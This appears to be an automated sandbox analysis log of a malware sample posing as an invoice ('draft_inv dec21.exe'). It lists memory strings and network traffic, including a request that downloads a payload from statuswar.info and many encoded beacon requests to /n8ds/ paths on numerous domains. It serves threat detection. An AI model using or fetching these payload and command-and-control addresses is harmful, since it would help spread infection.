Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: svchost.exe, 0000000B.00000002.11095566235.0000000004D32000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: svchost.exe, 0000000B.00000002.11095566235.0000000004D32000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie/+= equals www.linkedin.com (Linkedin)
Source: svchost.exe, 0000000B.00000002.11095566235.0000000004D32000.00000004.00020000.sdmp	String found in binary or memory: .www.linkedin.combscookie//a equals www.linkedin.com (Linkedin)

Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp	String found in binary or memory: http://181ue.com/sq.html?entry=
Source: draft_inv dec21.exe, 00000008.00000003.6723833827.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6725673470.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726515151.000000000089F000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726184531.0000000000896000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6920864857.00000000008A2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6724195797.00000000008A3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: draft_inv dec21.exe, 00000008.00000003.6723833827.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6725673470.00000000008A3000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726515151.000000000089F000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6726184531.0000000000896000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000002.6920864857.00000000008A2000.00000004.00000001.sdmp, draft_inv dec21.exe, 00000008.00000003.6724195797.00000000008A3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000A.00000000.7095220223.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6812895943.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6860287928.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6763636920.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digi
Source: explorer.exe, 0000000A.00000000.6762309173.000000000DD29000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7093850961.000000000DD29000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6859178062.000000000DD29000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6811980327.000000000DD29000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 0000000A.00000000.7095220223.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6812895943.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6860287928.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6763636920.000000000DE22000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 0000000A.00000000.6766176363.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6815284036.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6863015163.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7097487639.0000000010AE3000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866798303.00000000114C0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6769282903.00000000114C0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818714689.00000000114C0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 0000000A.00000000.6850853985.000000000AAF0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6849380205.0000000009F70000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.6736651526.00000000033E0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.micro
Source: UserOOBEBroker.exe, 00000003.00000002.11083878638.000002278EAB0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.microso
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000000A.00000000.6746304267.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6845108468.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6796864976.000000000993A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078024608.000000000993A000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 0000000A.00000000.6845627993.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6746869625.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6797467749.00000000099AD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7078654239.00000000099AD000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000A.00000000.7090429730.000000000D913000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000A.00000000.6810627291.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6857788973.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6760638241.000000000DBDD000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7092262614.000000000DBDD000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7077199847.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6844291725.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6745620416.0000000009896000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6796095372.0000000009896000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp	String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp	String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation8
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp	String found in binary or memory: https://excel.office.comv
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6769343918.00000000114CB000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866893237.00000000114CB000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818792515.00000000114CB000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp	String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: svchost.exe, 0000000B.00000002.11088928256.00000000034A6000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/
Source: svchost.exe, 0000000B.00000002.11088928256.00000000034A6000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com//
Source: svchost.exe, 0000000B.00000002.11088928256.00000000034A6000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/v104
Source: explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.comUser6
Source: explorer.exe, 0000000A.00000000.6846488668.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7079654654.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747800110.0000000009A5F000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798490214.0000000009A5F000.00000004.00000001.sdmp	String found in binary or memory: https://powerpoint.office.comEM8
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp	String found in binary or memory: https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=
Source: draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp	String found in binary or memory: https://statuswar.info/
Source: draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp	String found in binary or memory: https://statuswar.info/1
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp	String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin
Source: draft_inv dec21.exe, 00000008.00000002.6920468519.0000000000871000.00000004.00000020.sdmp	String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin#
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp	String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.bin9
Source: draft_inv dec21.exe, 00000008.00000002.6920230335.0000000000852000.00000004.00000020.sdmp	String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.binO
Source: draft_inv dec21.exe, 00000008.00000002.6919966464.0000000000828000.00000004.00000020.sdmp	String found in binary or memory: https://statuswar.info/GHDFR/bin_rOlFDOAa61.binZ
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp	String found in binary or memory: https://track.uc.cn/collect
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 0000000A.00000000.7087565531.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6755416072.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6806548919.000000000D6B0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6853693363.000000000D6B0000.00000004.00000001.sdmp	String found in binary or memory: https://word.office.com
Source: svchost.exe, 0000000B.00000002.11095222346.00000000041D2000.00000004.00020000.sdmp	String found in binary or memory: https://www.avto-click.com/n8ds/?gHl=36nvuDOhb
Source: explorer.exe, 0000000A.00000000.7092992649.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6761388755.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6787904265.00000000033F0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6867008814.00000000114D9000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6858399983.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6736702475.00000000033F0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6811191351.000000000DC71000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6835881125.00000000033F0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7066893065.00000000033F0000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 0000000A.00000000.6769023376.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6866481600.0000000011483000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6818418295.0000000011483000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000000A.00000000.7079491196.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747662969.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6846369440.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798323210.0000000009A47000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 0000000A.00000000.7079491196.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6747662969.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6846369440.0000000009A47000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6798323210.0000000009A47000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpd
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 0000000A.00000000.6842091530.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.7074720251.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6793949002.00000000055B4000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.6743868804.00000000055B4000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown

DNS traffic detected: queries for: statuswar.info

Source: global traffic	HTTP traffic detected: GET /GHDFR/bin_rOlFDOAa61.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: statuswar.infoCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4 HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=HP3lUcly75+aK0axQNs5BYQcBP4O+AKLEkTZ4laoLz9/Sn12VzNllTYHErR4gbC1MkpJ&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.luxalbridi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=UGKaYhNfstwp7hLG7UrFh27uWUnvgBcRCHkNbEmp8q6nPSt6bmPZIRKUPgjia3mN02Vr HTTP/1.1Host: www.apps365.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=tFWpUqTJBKKZjj7mpmRmO+UO9YCEuI1l6CuT88R3V9vk9mUNjYvQT6q9cPheoq+XMEYl&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.receiptpor.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=f/B16EdvHg/4mql2vq5Md1sx/t71Njj4R8zlekrOfJu06zuLM7yaFZuMLQOQaJsZfcYK HTTP/1.1Host: www.writingmomsobitwithmom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=FAvywzfH3HDMRaMd6mXcK7Ff9728JoUvMaeuTcvdPUDnDDD48ydkC5f+8+l9m9miG/Ye&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.quickcoreohio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=Sj2jHWqmlaqVQSbjgunx+H7yNQtdqjg6ckEoQlWTrRUvY2HVGecaPyLp6mXUMYnymgSe&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dczhd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=p9I58q6arTbdr9cKXlwfdhVh2EEOLbkp3e4XnVrXYsEKFiBKUQDH2p9qO5FVTmLJCNVs&pB=z2JtXhtxAhidvN HTTP/1.1Host: www.dubaicars.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=36nvuDOhb+cAfEYoHlPXfn1RMzo0BBULKTbTy1LRYyC8hoxuY2l1xvAmELDfWhX0UcPs&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.avto-click.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?gHl=ugV9/Bgr3P1mb2nQP4ZDF3X4f1GtZOS3PBkli+plGM3Op0j+GZlR0Q/pb3EXjxNGdMZ9&4ha8=4hi0dlyHZliDfr HTTP/1.1Host: www.mariforum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?4ha8=4hi0dlyHZliDfr&gHl=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?3fIl1=6lYt5jhP&gHl=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
